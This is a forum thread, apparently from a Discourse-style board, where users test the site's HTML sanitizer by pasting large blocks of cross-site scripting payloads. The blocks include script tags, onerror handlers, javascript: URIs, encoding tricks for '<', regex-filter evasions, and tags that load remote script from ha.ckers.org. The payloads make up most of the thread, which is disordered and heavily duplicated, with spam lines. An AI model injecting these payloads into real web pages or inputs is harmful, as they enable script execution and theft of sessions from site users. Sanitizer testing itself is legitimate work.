JellyPotato (Warning, Should probably stay out.)



  • redacted - bz



  • @Matches


    redacted -bz

    Jelly



  • Now for some paging



  • Now for some paging



  • Now for some paging



  • redacted - bz



  • redacted - bz



  • redacted - bz




  • F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    [omitted]



  • Dance for me <script>alert('Maybe')</script><scri%20pt>alert('idk')</script%><!--<script>alert('Maybe')</script-->>





  • XSS

    <
    %3C
    &lt
    <
    &LT
    <
    &#60
    &#060
    &#0060
    &#00060
    &#000060
    &#0000060
    <
    <
    <
    <
    <
    <
    &#x3c
    &#x03c
    &#x003c
    &#x0003c
    &#x00003c
    &#x000003c
    <
    <
    <
    <
    <
    <
    &#X3c
    &#X03c
    &#X003c
    &#X0003c
    &#X00003c
    &#X000003c
    <
    <
    <
    <
    <
    <
    &#x3C
    &#x03C
    &#x003C
    &#x0003C
    &#x00003C
    &#x000003C
    <
    <
    <
    <
    <
    <
    &#X3C
    &#X03C
    &#X003C
    &#X0003C
    &#X00003C
    &#X000003C
    <
    <
    <
    <
    <
    <
    \x3c
    \x3C
    \u003c
    \u003C



  • <form action="" method="GET">
    <input id="query" name="query" value="Enter query here..." onfocus="this.value=''">
    <input id="button" type="submit" value="Search">

    </form>


  • <img src=x onerror="

    Hum @Matches"/>

    <img src=x onerror="

    .jpg' />

    <script>alert('testing')</script>

    <body> Hello {{ USERNAME }}, view your Account. <script> var id = {{ USER_ID }}; alert("Your user ID is: " + id); </script> </body>


  • ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--></S »
    CRIPT>">'><SCRIPT>alert(Stri »
    ng.fromCharCode(88,83,83))</ »
    SCRIPT>=&{}



  • <div '';!--"<XSS>=&{()}

    <BGSOUND »
    SRC="javascript:alert('XSS') »
    ;">

    <BASE » HREF="javascript:alert('XSS' » );//">


  • Locator
    ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--></S »
    CRIPT>">'><SCRIPT>alert(Stri »
    ng.fromCharCode(88,83,83))</ »
    SCRIPT>=&{}
    ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--> »
    ">'>=&{}
    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
    XSS Quick Test
    '';!--"<xss>=&{()}<br/> '';!--"=&{()}<br/> '';!--"=&{()}<br/> SCRIPT w/Alert()</xss>

    <script>alert('XSS')</SCRIPT » > SCRIPT w/Source File <SCRIPT » SRC=http://ha.ckers.org/xss. » js></SCRIPT> <p>SCRIPT w/Char Code</p> <SCRIPT>alert(String.fromCha » rCode(88,83,83))</SCRIPT> <p>BASE</p> <BASE » HREF="javascript:alert('XSS' » );//"> BGSOUND <BGSOUND » SRC="javascript:alert('XSS') » ;"> BODY background-image <BODY » BACKGROUND="javascript:alert » ('XSS');"> BODY ONLOAD <BODY ONLOAD=alert('XSS')> DIV background-image 1 <DIV » STYLE="background-image: » url(javascript:alert('XSS')) » "> <div></div> DIV background-image 2 <DIV » STYLE="background-image: » url(javascript:alert('XS » S'))"> <div></div> DIV expression <DIV STYLE="width: » expression(alert('XSS'));"> <div></div> FRAME <FRAMESET><FRAME » SRC="javascript:alert('XSS') » ;"></FRAMESET> IFRAME <IFRAME » SRC="javascript:alert('XSS') » ;"></IFRAME> INPUT Image <INPUT TYPE="IMAGE" » SRC="javascript:alert('XSS') » ;"> IMG w/JavaScript Directive <IMG » SRC="javascript:alert('XSS') » ;"> IMG No Quotes/Semicolon <IMG » SRC=javascript:alert('XSS')> IMG Dynsrc <IMG » DYNSRC="javascript:alert('XS » S');"> IMG Lowsrc <IMG » LOWSRC="javascript:alert('XS » S');"> IMG Embedded commands 1 <IMG » SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode"> <img » src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" /> somecommand.php?somevariables=maliciousc IMG STYLE w/expression exp/*<XSS » STYLE='no\xss:noxss("*//*"); » <p>xss:ex/<em>XSS</em>//<em>/</em> »<br /> /pression(alert(&quot;XSS&quot;))'&gt;<br /> exp/*<br /> exp/*<br /> List-style-image</p> <STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE><UL><LI>XSS <ul><li>XSS</li></ul> XSS IMG w/VBscript <IMG » SRC='vbscript:msgbox("XSS")' » > LAYER <LAYER » SRC="http://ha.ckers.org/scr » iptlet.html"></LAYER> Livescript <IMG » SRC="livescript:[code]"> US-ASCII encoding scriptalert(XSS)/script » scriptalert(XSS)/script scriptalert(XSS)/script META <META HTTP-EQUIV="refresh" » CONTENT="0;url=javascript:al » ert('XSS');"> META w/data:URL <META HTTP-EQUIV="refresh" » CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K"> META w/additional URL parameter <META HTTP-EQUIV="refresh" » CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');"> Mocha <IMG SRC="mocha:[code]"> OBJECT <OBJECT » TYPE="text/x-scriptlet" » DATA="http://ha.ckers.org/sc » riptlet.html"></OBJECT> OBJECT w/Embedded XSS <OBJECT » classid=clsid:ae24fdae-03c6- » 11d1-8b76-0080c744f389><para » m name=url » value=javascript:alert('XSS' » )></OBJECT> Embed Flash <EMBED » SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED> STYLE <STYLE » TYPE="text/javascript">alert » ('XSS');</STYLE> STYLE w/Comment <IMG » STYLE="xss:expr/*XSS*/ession » (alert('XSS'))"> STYLE w/Anonymous HTML <XSS » STYLE="xss:expression(alert( » 'XSS'))"> STYLE w/background-image <STYLE>.XSS{background-image » :url("javascript:alert('XSS' » )");}</STYLE><A » CLASS=XSS></A> <a class="XSS"></a> STYLE w/background <STYLE » type="text/css">BODY{backgro » und:url("javascript:alert('X » SS')")}</STYLE> Stylesheet <LINK REL="stylesheet" » HREF="javascript:alert('XSS' » );"> Remote Stylesheet 1 <LINK REL="stylesheet" » HREF="http://ha.ckers.org/xs » s.css"> Remote Stylesheet 2 <STYLE>@import'http://ha.cke » rs.org/xss.css';</STYLE> Remote Stylesheet 3 <META HTTP-EQUIV="Link" » Content="<http://ha.ckers.or » g/xss.css>; REL=stylesheet"> Remote Stylesheet 4 <STYLE>BODY{-moz-binding:url » ("http://ha.ckers.org/xssmoz » .xml#xss")}</STYLE> TABLE <TABLE » BACKGROUND="javascript:alert » ('XSS')"></TABLE> TD <TABLE><TD » BACKGROUND="javascript:alert » ('XSS')"></TD></TABLE> XML namespace <HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML> <?import namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> XSS <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS XML data island w/CDATA <XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> <p></C></X> »<br /> </xml><SPAN DATASRC=#I »<br /> DATAFLD=C DATAFORMATAS=HTML><br /> <IMG »<br /> SRC="javascript:alert('XSS') »<br /> ;"></p> <p><span></span><br /> <IMG SRC="javascript:alert('XSS');"><br /> XML data island w/comment <br /> <XML ID="xss"><I><B><IMG »<br /> SRC="javas<!-- » -->cript:alert('XSS')"></B>< »<br /> /I></XML></p> <p><SPAN »<br /> DATASRC="#xss" DATAFLD="B" »<br /> DATAFORMATAS="HTML"></SPAN><br /> <i><b><img src="javas" »<br /> alt="javas<!-- »<br /> -->cript:alert('XSS')" »<br /> /></b></i><span></span><br /> javas<!-- -->cript:alert('XSS')<br /> XML (locally hosted) <br /> <XML »<br /> SRC="<a href="http://ha.ckers.org/xss" rel="nofollow">http://ha.ckers.org/xss</a> »<br /> test.xml" ID=I></XML><br /> <SPAN »<br /> DATASRC=#I DATAFLD=C »<br /> DATAFORMATAS=HTML></SPAN><br /> <span></span><br /> XML HTML+TIME</p> <HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> Commented-out Block <!--[if gte IE » 4]> <SCRIPT>alert('XSS');</S » CRIPT> <![endif]--> Cookie Manipulation <META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>"> Local .htc file <XSS STYLE="behavior: » url(http://ha.ckers.org/xss. » htc);"> Rename .js to .jpg <SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT> SSI <!--#exec cmd="/bin/echo » '<SCRIPT SRC'"--><!--#exec » cmd="/bin/echo » '=http://ha.ckers.org/xss.js » ></SCRIPT>'"--> PHP <? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?> <p><? echo('alert("XSS")'); »<br /> ?></p> <? echo('alert("XSS")'); ?> <p>JavaScript Includes <br /> <BR SIZE="&{alert('XSS')}"><br /> <br /></p> <p>Character Encoding Example <br /> <<br /> %3C<br /> &lt<br /> <<br /> &LT<br /> <<br /> &#60 »</p> <p>&#060<br /> &#0060</p> <p>&#00060<br /> &#000 »<br /> 060<br /> &#0000060<br /> <<br /> <<br /> & »<br /> #0060;<br /> <<br /> <<br /> &# »<br /> 0000060;<br /> &#x3c<br /> &#x03c<br /> &#x003 »<br /> c<br /> &#x0003c<br /> &#x00003c<br /> &#x0000 »<br /> 03c<br /> <<br /> <</p> <p>< »</p> <p><<br /> <<br /> &#x000 »<br /> 003c;<br /> &#X3c<br /> &#X03c<br /> &#X003c<br /> & »<br /> #X0003c<br /> &#X00003c<br /> &#X000003c »</p> <p><<br /> <<br /> <<br /> &#X »<br /> 0003c;<br /> <<br /> &#X000003c »<br /> ;<br /> &#x3C</p> <p>&#x03C<br /> &#x003C<br /> &#x0 »<br /> 003C<br /> &#x00003C<br /> &#x000003C<br /> &# »<br /> x3C;<br /> <<br /> <<br /> &#x000 »<br /> 3C;<br /> <<br /> <<br /> & »<br /> #X3C<br /> &#X03C<br /> &#X003C<br /> &#X0003C »</p> <p>&#X00003C<br /> &#X000003C</p> <p>&#X3C »<br /> ;<br /> <<br /> <<br /> < »</p> <p><<br /> <<br /> \x3c »</p> <p>\x3C<br /> \u003c<br /> \u003C<br /> <<br /> %3C<br /> &lt<br /> <<br /> &L »<br /> T<br /> &LT;<br /> <<br /> <<br /> <</p> <p>& »<br /> lt;<br /> <<br /> <<br /> <<br /> <<br /> < »</p> <p><<br /> <<br /> <<br /> <<br /> <<br /> &l »<br /> t;<br /> <<br /> <<br /> <<br /> <<br /> <<br /> »</p> <p><<br /> <<br /> <<br /> <<br /> <<br /> &l »<br /> t;<br /> <<br /> <<br /> <<br /> <<br /> <<br /> »<br /> <<br /> <<br /> <<br /> <<br /> <<br /> &lt »<br /> ;</p> <p><<br /> <<br /> <<br /> <<br /> <<br /> »<br /> <<br /> <<br /> <<br /> <<br /> <<br /> &lt »<br /> ;<br /> <<br /> <<br /> <<br /> <<br /> <<br /> & »<br /> lt;</p> <p><<br /> <<br /> <<br /> <<br /> &lt »<br /> ;<br /> <<br /> \x3c<br /> \x3C<br /> \u003c<br /> \u00 »<br /> 3C<br /> < %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C<br /> Case Insensitive <br /> <IMG »<br /> SRC=JaVaScRiPt:alert('XSS')><br /> HTML Entities <br /> <IMG »<br /> SRC=javascript:alert("X »<br /> SS")><br /> Grave Accents <br /> <IMG »<br /> SRC=<code>javascript:alert("RSnak » e says, 'XSS'")</code>><br /> <img »<br /> src="%60javascript%3Aalert(" »<br /> alt="<code>javascript:alert(&quot » ;RSnake" /></code>javascript:alert("RSnake<br /> Image w/CharCode <br /> <IMG »<br /> SRC=javascript:alert(String. »<br /> fromCharCode(88,83,83))><br /> UTF-8 Unicode Encoding <br /> <IMG »<br /> SRC=java&# »<br /> 115;crip& »<br /> #116;:ale& »<br /> #114;t('X&# »<br /> 83;S')><br /> Long UTF-8 Unicode w/out Semicolons <br /> <IMG »<br /> SRC=&#0000106&#0000097&#0000 »<br /> 118&#0000097&#0000115&#00000 »<br /> 99&#0000114&#0000105&#000011 »<br /> 2&#0000116&#0000058&#0000097 »<br /> &#0000108&#0000101&#0000114& »<br /> #0000116&#0000040&#0000039&# »<br /> 0000088&#0000083&#0000083&#0 »<br /> 000039&#0000041><br /> DIV w/Unicode</p> <DIV » STYLE="background-image:\007 » 5\0072\006C\0028'\006a\0061\ » 0076\0061\0073\0063\0072\006 » 9\0070\0074\003a\0061\006c\0 » 065\0072\0074\0028.1027\0058 » .1053\0053\0027\0029'\0029"> <div></div> Hex Encoding w/out Semicolons <IMG » SRC=java » 3cript&# » x3Aalert » ('XSS&#x » 27)> UTF-7 Encoding <HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS') » ;+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- Escaping JavaScript escapes \";alert('XSS');// \";alert('XSS');// \";alert('XSS');// End title tag </TITLE><SCRIPT>alert("XSS") » ;</SCRIPT> STYLE w/broken up JavaScript <STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE> Embedded Tab <IMG » SRC="jav\tascript:alert('XSS' » );"> <img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" /> jav ascript:alert('XSS'); Embedded Encoded Tab <IMG » SRC="jav ascript:alert( » 'XSS');"> <img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" /> jav ascript:alert('XSS'); Embedded Newline <IMG » SRC="jav ascript:alert( » 'XSS');"> <img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" /> jav ascript:alert('XSS'); Embedded Carriage Return <IMG » SRC="jav ascript:alert( » 'XSS');"> <img » src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" /> jav ascript:alert('XSS'); Multiline w/Carriage Returns <IMG SRC = " j a v a s c r i » <p>p<br /> t<br /> :<br /> a<br /> l<br /> e<br /> r<br /> t<br /> (<br /> '<br /> X<br /> S<br /> S<br /> ' »</p> <p>)<br /> "</p> <blockquote></blockquote> <p><img »<br /> src="j%20a%20v%20a%20s%20c%2 »<br /> 0r%20i%20p%20t%20%3A%20a%20l »<br /> %20e%20r%20t%20(%20'%20X%20S »<br /> %20S%20'%20)" alt="j a v a s »<br /> c r i p t : a l e r t ( ' X »<br /> S" /><br /> j a v a s c r i p t : a l e r t ( ' X S<br /> Null Chars 1 <br /> <IMG »<br /> SRC=java\0script:alert("XSS") »</p> <blockquote></blockquote> <p>Null Chars 2 <br /> &<SCR\0IPT>alert("XSS")</SCR\0 »<br /> IPT><br /> &<br /> &<br /> Spaces/Meta Chars <br /> <IMG SRC="  » javascript:alert('XSS');"><br /> Non-Alpha/Non-Digit <br /> <SCRIPT/XSS »<br /> SRC="<a href="http://ha.ckers.org/xss" rel="nofollow">http://ha.ckers.org/xss</a> »<br /> .js"></SCRIPT><br /> Non-Alpha/Non-Digit Part 2</p> <BODY » onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")> No Closing Script Tag <SCRIPT » SRC=http://ha.ckers.org/xss. » js Protocol resolution in script tags <SCRIPT » SRC=//ha.ckers.org/.j> Half-Open HTML/JavaScript <IMG » SRC="javascript:alert('XSS') » " Double open angle brackets <IFRAME » SRC=http://ha.ckers.org/scri » ptlet.html < Extraneous Open Brackets <<SCRIPT>alert("XSS");//<</S » CRIPT> < < Malformed IMG Tags <IMG » """><SCRIPT>alert("XSS")</SC » RIPT>"> "> "> No Quotes/Semicolons <SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT> Evade Regex Filter 1 <SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 2 <SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 3 <SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 4 <SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 5 <SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Filter Evasion 1 <SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> PT » SRC="http://ha.ckers.org/xss » .js"> PT SRC="http://ha.ckers.org/xss.js"> Filter Evasion 2 <SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> IP Encoding <A » HREF="http://66.102.7.147/"> » XSS</A> <a » href="http://66.102.7.147/"> » XSS</a> XSS URL Encoding <A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A> <a>XSS</a> XSS Dword Encoding <A » HREF="http://1113982867/">XS » S</A> <a href="/">XSS</a> XSS Hex Encoding <A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A> <a href="/">XSS</a> XSS Octal Encoding <A » HREF="http://0102.0146.0007. » 00000223/">XSS</A> <a href="/">XSS</a> XSS Mixed Encoding <A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A> <a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a> XSS Protocol Resolution Bypass <A » HREF="//www.google.com/">XSS » </A> <a>XSS</a> XSS Firefox Lookups 1 <A HREF="//google">XSS</A> <a href="//google">XSS</a> XSS Firefox Lookups 2 <A » HREF="http://ha.ckers.org@go » ogle">XSS</A> <a » href="http://google">XSS</a> XSS Firefox Lookups 3 <A » HREF="http://google:ha.ckers » .org">XSS</A> <a » href="http://google">XSS</a> XSS Removing Cnames <A » HREF="http://google.com/">XS » S</A> <a>XSS</a> XSS Extra dot for Absolute DNS <A » HREF="http://www.google.com. » /">XSS</A> <a>XSS</a> XSS JavaScript Link Location <A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A> <a>XSS</a> XSS Content Replace <A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A> <a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a> XSS</script>


  • Just so you know, the source code for the HTML sanitizer is here:



  • <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">

    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />

    IMG Lowsrc
    <IMG »
    LOWSRC="javascript:alert('XS »
    S');">
    IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />



  • What's the fun in that?
    @ben_lubar Something broke in the big block from http://htmlpurifier.org/live/smoketests/xssAttacks.php - trying to figure out which combination caused it.



  • IMG Dynsrc
    <IMG »
    DYNSRC="javascript:alert('XS »
    S');">
    IMG Lowsrc
    <IMG »
    LOWSRC="javascript:alert('XS »
    S');">
    IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />
    somecommand.php?somevariables=maliciousc





  • IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />
    somecommand.php?somevariables=maliciousc
    IMG STYLE w/expression
    exp/<XSS »
    STYLE='no\xss:noxss("
    //*"); »

    xss:ex/XSS/// »
    /pression(alert("XSS"))'>
    exp/*
    exp/*
    List-style-image

    <STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE>
    • XSS
      • XSS
      XSS IMG w/VBscript LAYER <LAYER » SRC="http://ha.ckers.org/scr » iptlet.html"></LAYER> Livescript US-ASCII encoding scriptalert(XSS)/script » scriptalert(XSS)/script scriptalert(XSS)/script META <META HTTP-EQUIV="refresh" » CONTENT="0;url=javascript:al » ert('XSS');"> META w/data:URL <META HTTP-EQUIV="refresh" » CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K"> META w/additional URL parameter <META HTTP-EQUIV="refresh" » CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');"> Mocha OBJECT <OBJECT » TYPE="text/x-scriptlet" » DATA="http://ha.ckers.org/sc » riptlet.html"></OBJECT> OBJECT w/Embedded XSS <OBJECT » classid=clsid:ae24fdae-03c6- » 11d1-8b76-0080c744f389><para » m name=url » value=javascript:alert('XSS' » )></OBJECT> Embed Flash <EMBED » SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED> STYLE <STYLE » TYPE="text/javascript">alert » ('XSS');</STYLE> STYLE w/Comment STYLE w/Anonymous HTML <XSS » STYLE="xss:expression(alert( » 'XSS'))"> STYLE w/background-image <STYLE>.XSS{background-image » :url("javascript:alert('XSS' » )");}</STYLE> STYLE w/background <STYLE » type="text/css">BODY{backgro » und:url("javascript:alert('X » SS')")}</STYLE> Stylesheet <LINK REL="stylesheet" » HREF="javascript:alert('XSS' » );"> Remote Stylesheet 1 <LINK REL="stylesheet" » HREF="http://ha.ckers.org/xs » s.css"> Remote Stylesheet 2 <STYLE>@import'http://ha.cke » rs.org/xss.css';</STYLE> Remote Stylesheet 3 <META HTTP-EQUIV="Link" » Content="<http://ha.ckers.or » g/xss.css>; REL=stylesheet"> Remote Stylesheet 4 <STYLE>BODY{-moz-binding:url » ("http://ha.ckers.org/xssmoz » .xml#xss")}</STYLE> TABLE
      TD
      XML namespace <HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML> <?import namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> XSS <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS XML data island w/CDATA <XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]>

      </C></X> »
      </xml><SPAN DATASRC=#I »
      DATAFLD=C DATAFORMATAS=HTML>
      <IMG »
      SRC="javascript:alert('XSS') »
      ;">



      XML data island w/comment
      <XML ID="xss"><IMG »
      SRC="javas<!-- » -->cript:alert('XSS')">
      < »
      /I></XML>

      <SPAN »
      DATASRC="#xss" DATAFLD="B" »
      DATAFORMATAS="HTML">
      <img src="javas" »
      alt="javas<!-- »
      -->cript:alert('XSS')" »
      />

      javas<!-- -->cript:alert('XSS')
      XML (locally hosted)
      <XML »
      SRC="http://ha.ckers.org/xss »
      test.xml" ID=I></XML>
      <SPAN »
      DATASRC=#I DATAFLD=C »
      DATAFORMATAS=HTML>

      XML HTML+TIME

      <HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> Commented-out Block <!--[if gte IE » 4]> <SCRIPT>alert('XSS');</S » CRIPT> <![endif]--> Cookie Manipulation <META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>"> Local .htc file <XSS STYLE="behavior: » url(http://ha.ckers.org/xss. » htc);"> Rename .js to .jpg <SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT> SSI <!--#exec cmd="/bin/echo » '<SCRIPT SRC'"--><!--#exec » cmd="/bin/echo » '=http://ha.ckers.org/xss.js » ></SCRIPT>'"--> PHP <? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?>

      <? echo('alert("XSS")'); »
      ?>

      <? echo('alert("XSS")'); ?>

      JavaScript Includes



      Character Encoding Example
      <
      %3C
      &lt
      <
      &LT
      <
      &#60 »

      &#060
      &#0060

      &#00060
      &#000 »
      060
      &#0000060
      <
      <
      & »
      #0060;
      <
      <
      &# »
      0000060;
      &#x3c
      &#x03c
      &#x003 »
      c
      &#x0003c
      &#x00003c
      &#x0000 »
      03c
      <
      <

      < »

      <
      <
      &#x000 »
      003c;
      &#X3c
      &#X03c
      &#X003c
      & »
      #X0003c
      &#X00003c
      &#X000003c »

      <
      <
      <
      &#X »
      0003c;
      <
      &#X000003c »
      ;
      &#x3C

      &#x03C
      &#x003C
      &#x0 »
      003C
      &#x00003C
      &#x000003C
      &# »
      x3C;
      <
      <
      &#x000 »
      3C;
      <
      <
      & »
      #X3C
      &#X03C
      &#X003C
      &#X0003C »

      &#X00003C
      &#X000003C

      &#X3C »
      ;
      <
      <
      < »

      <
      <
      \x3c »

      \x3C
      \u003c
      \u003C
      <
      %3C
      &lt
      <
      &L »
      T
      &LT;
      <
      <
      <

      & »
      lt;
      <
      <
      <
      <
      < »

      <
      <
      <
      <
      <
      &l »
      t;
      <
      <
      <
      <
      <
      »

      <
      <
      <
      <
      <
      &l »
      t;
      <
      <
      <
      <
      <
      »
      <
      <
      <
      <
      <
      &lt »
      ;

      <
      <
      <
      <
      <
      »
      <
      <
      <
      <
      <
      &lt »
      ;
      <
      <
      <
      <
      <
      & »
      lt;

      <
      <
      <
      <
      &lt »
      ;
      <
      \x3c
      \x3C
      \u003c
      \u00 »
      3C
      < %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
      Case Insensitive
      <IMG »
      SRC=JaVaScRiPt:alert('XSS')>
      HTML Entities
      <IMG »
      SRC=javascript:alert("X »
      SS")>
      Grave Accents
      <IMG »
      SRC=javascript:alert("RSnak » e says, 'XSS'")>
      <img »
      src="%60javascript%3Aalert(" »
      alt="javascript:alert(&quot » ;RSnake" />javascript:alert("RSnake
      Image w/CharCode
      <IMG »
      SRC=javascript:alert(String. »
      fromCharCode(88,83,83))>
      UTF-8 Unicode Encoding
      <IMG »
      SRC=java&# »
      115;crip& »
      #116;:ale& »
      #114;t('X&# »
      83;S')>
      Long UTF-8 Unicode w/out Semicolons
      <IMG »
      SRC=&#0000106&#0000097&#0000 »
      118&#0000097&#0000115&#00000 »
      99&#0000114&#0000105&#000011 »
      2&#0000116&#0000058&#0000097 »
      &#0000108&#0000101&#0000114& »
      #0000116&#0000040&#0000039&# »
      0000088&#0000083&#0000083&#0 »
      000039&#0000041>
      DIV w/Unicode

      Hex Encoding w/out Semicolons UTF-7 Encoding <HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS') » ;+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- Escaping JavaScript escapes \";alert('XSS');// \";alert('XSS');// \";alert('XSS');// End title tag </TITLE><SCRIPT>alert("XSS") » ;</SCRIPT> STYLE w/broken up JavaScript <STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE> Embedded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Encoded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Newline jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Carriage Return jav »
